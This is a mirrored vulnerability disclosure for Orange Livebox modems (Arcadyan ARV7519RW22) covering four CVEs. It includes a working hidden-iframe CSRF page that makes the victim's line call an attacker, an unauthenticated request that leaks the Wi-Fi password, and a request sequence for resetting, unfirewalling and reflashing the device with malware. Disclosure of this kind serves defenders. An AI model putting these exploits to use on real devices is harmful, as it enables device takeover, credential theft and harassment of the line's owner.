All Projects → zadewg → Livebox 0day

zadewg / Livebox 0day

Licence: mit
Arcadyan ARV7519RW22-A-L T VR9 1.2 Multiple security vulnerabilities affecting latest firmware release on ORANGE Livebox modems.

Projects that are alternatives of or similar to Livebox 0day

Pc Engines Apu Router Guide
Guide to building a Linux or BSD router on the PC Engines APU platform
Stars: ✭ 101 (+48.53%)
Mutual labels:  router, privacy
Route Recognizer
Recognizes URL patterns with support for dynamic and wildcard segments
Stars: ✭ 65 (-4.41%)
Mutual labels:  router
Ethsnarks Miximus
Example project for EthSnarks - Miximus coin mixer
Stars: ✭ 58 (-14.71%)
Mutual labels:  privacy
Owasp Seraphimdroid
OWASP Seraphimdroid is an open source project with aim to create, as a community, an open platform for education and protection of Android users against privacy and security threats.
Stars: ✭ 62 (-8.82%)
Mutual labels:  privacy
Drops
opmsg p2p transport network
Stars: ✭ 58 (-14.71%)
Mutual labels:  privacy
Nosurf
CSRF protection middleware for Go.
Stars: ✭ 1,131 (+1563.24%)
Mutual labels:  csrf
Secured Links
CSRF protection for Nette Framework presenters' signals.
Stars: ✭ 57 (-16.18%)
Mutual labels:  csrf
Actions Openwrt K2p
Use Github Actions to automatically compile Lean's Modified Lede source for K2P
Stars: ✭ 67 (-1.47%)
Mutual labels:  router
Dorado
基于Netty4开发的简单、轻量级、高性能的的Http restful api server
Stars: ✭ 65 (-4.41%)
Mutual labels:  router
Ng2 Breadcrumbs
A breadcrumb service for the Angular 7 router
Stars: ✭ 61 (-10.29%)
Mutual labels:  router
Vue Component Router
A component-based, declarative router for vue. Inspired by React Router 4
Stars: ✭ 61 (-10.29%)
Mutual labels:  router
Dnscrypt Menu
Manage DNSCrypt from the macOS menu bar (BitBar plugin)
Stars: ✭ 59 (-13.24%)
Mutual labels:  privacy
Cloakify
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection
Stars: ✭ 1,136 (+1570.59%)
Mutual labels:  privacy
Pathwar
☠️ The Pathwar Project ☠️
Stars: ✭ 58 (-14.71%)
Mutual labels:  privacy
Flowa
🔥Service level control flow for Node.js
Stars: ✭ 66 (-2.94%)
Mutual labels:  router
Kindmetrics
Kind metrics analytics for your website
Stars: ✭ 57 (-16.18%)
Mutual labels:  privacy
Megachat
MEGA C++ SDK for chat-enabled apps
Stars: ✭ 61 (-10.29%)
Mutual labels:  privacy
Mia
A library for running membership inference attacks against ML models
Stars: ✭ 63 (-7.35%)
Mutual labels:  privacy
Route
原生 js 实现的轻量级路由,且页面跳转间有缓存功能。
Stars: ✭ 68 (+0%)
Mutual labels:  router
Awesome I2p
A curated list of awesome I2P implementations, libraries, resources, projects, and shiny things. I2P is an anonymous overlay network - a network within a network. It is intended to protect communication from dragnet surveillance and monitoring by third parties such as ISPs.
Stars: ✭ 66 (-2.94%)
Mutual labels:  privacy

LIVEBOX-0DAY CVE-2018-20377; 20575; 20576; 20577

Arcadyan ARV7519RW22-A-L T VR9 1.2 Multiple security vulnerabilities affecting latest firmware release on ORANGE Livebox ADSL modems.

Versión de Firmware:  00.96.320S (01.11.2017-11:43:44)
Versión del Boot:  v0.70.03
Versión del Módem ADSL: 5.4.1.10.1.1A
Versión de Hardware:  02

CWE-359: Exposure of Private Information ('Privacy Violation'). CVE-2018-20576 Detail

A very serious attack vector allows an attacker to link CSRF drive-by vulnerabilities to exploit Autodialing and Line Test features, succesfully making calls from a victim's line, exposing a client's phone number and making him susceptible to scams and impersonation. Nuisance calls alone are also a serious concern.

Proof of concept exploit:

<!DOCTYPE html>

<!-- Phone number disclosure, reflected call exploit -->

<html>

<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
<form style="display:none" method='POST' action='http://192.168.1.1/cgi-bin/autodialing.exe' target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible">
  <input type='hidden' name='autodialing_enable' value='1'>
  <input type='hidden' name='autodialing_number' value='5550150'> <!-- attacker's phone number goes here -->
  <input type='hidden' name='autodialing_timeout' value='0'>
  <input type='submit' value='Submit'>
</form>

<script>document.getElementById("csrf-form-invisible").submit()</script>

<img src="http://192.168.1.1/cgi-bin/phone_test.exe" width="0" height="0" border="0">

</html>

When the victim visits the malicious site, it will create an autodialing profile on the victim's modem, and activate the Line Test feature. No interaction needed. The phone will ring, and when the call is answered the autodialing feature will call the attacker's number.

 

Demo Attack scenario
DEMO This vector can be exploited to conduct false flag operations (such as impersonating an individual with a restraint order against another), marketing campaings, harassment, denial of service, and intelligence gathering.

 

CWE-200: Information Exposure: Unauthenticated configuration information leak. CVE-2018-20377 Detail

The webserver leaks access point security protocol, SSID, and password in plain text.
GET http://192.168.1.1/get_getnetworkconf.cgi
	<html>
	<body>
	Orange-SSID<BR>
	PASSWORD<BR>
	255.255.255.0<BR>
	192.168.1.1<BR>
	0<BR>
	WPA<BR>
	<BR>
	</body>
	</html>
CVSS v3.0 Severity and Metrics

Base Score: 9.8 CRITICAL
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (V3 legend)
Impact Score: 5.9
Exploitability Score: 3.9

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

CWE-352: Cross-Site Request Forgery (CSRF): The web application does not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. Allows an attacker to manipulate all configuration parameters. CVE-2018-20577 Detail

Integrity Impact 	Complete. 	(There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.)  
Availability Impact 	Complete.	(There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.)  
Access Complexity 	Low.		(Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )  
Authentication 		None.		(The vulnerability does not require an attacker or user to be logged into the system).   
User interaction        None.  
- Login with default admin:admin credentials after restoring configuration to factory settings. (This can be omited if the victim has an active session.)
- Change default credentials.
- Enable remote access.
- Upload custom firmware to install remote access malware or brick the system.


POST http://192.168.1.1/cgi-bin/restore.exe {empty body} Restores configuration to factory defaults.
POST http://192.168.1.1/cgi-bin/firewall_SPI.exe {empty body} Disables all firewall protections.
POST http://192.168.1.1/cgi-bin/setup_remote_mgmt.exe {IP1=FIRST_OCTET &IP2=SECOND_OCTET &IP3=THIRD_OCTET &IP4=FOURTH_OCTET &r_mgnt_port=_PORT } Allows remote administration. 
POST http://192.168.1.1/cgi-bin/setup_pass.exe	{submit_action=0&userNew=admin&userOldPswd=admin&userNewPswd=NEWPASS&userConPswd=NEWPASS&timeout=0} Changes default password.
POST http://192.168.1.1/cgi-bin/upgradep.exe Custom firmware update.

CWE-912: Hidden Functionality. The software contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the software's users or administrators. CVE-2018-20575 Detail

Manual firmware update. Allows malware to be installed as described before.

GET http://192.168.1.1/system_firmwarel.stm

 

Media coverage

On December the 21st-2018 a threat actor identified by Troy Mursch's honeypots at BadPackets LLC suspectedly attacked over 19000 vulnerable modems in Spain with the exploits described in this repository. The criminal targeted the Credentials Disclosure (CWE-200) vulnerability and likely employed Access Point geolocation databases such as my own GS-LOC to map the APs.


This project is licensed under the MIT License - see the LICENSE file for details

mapez - telegram

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].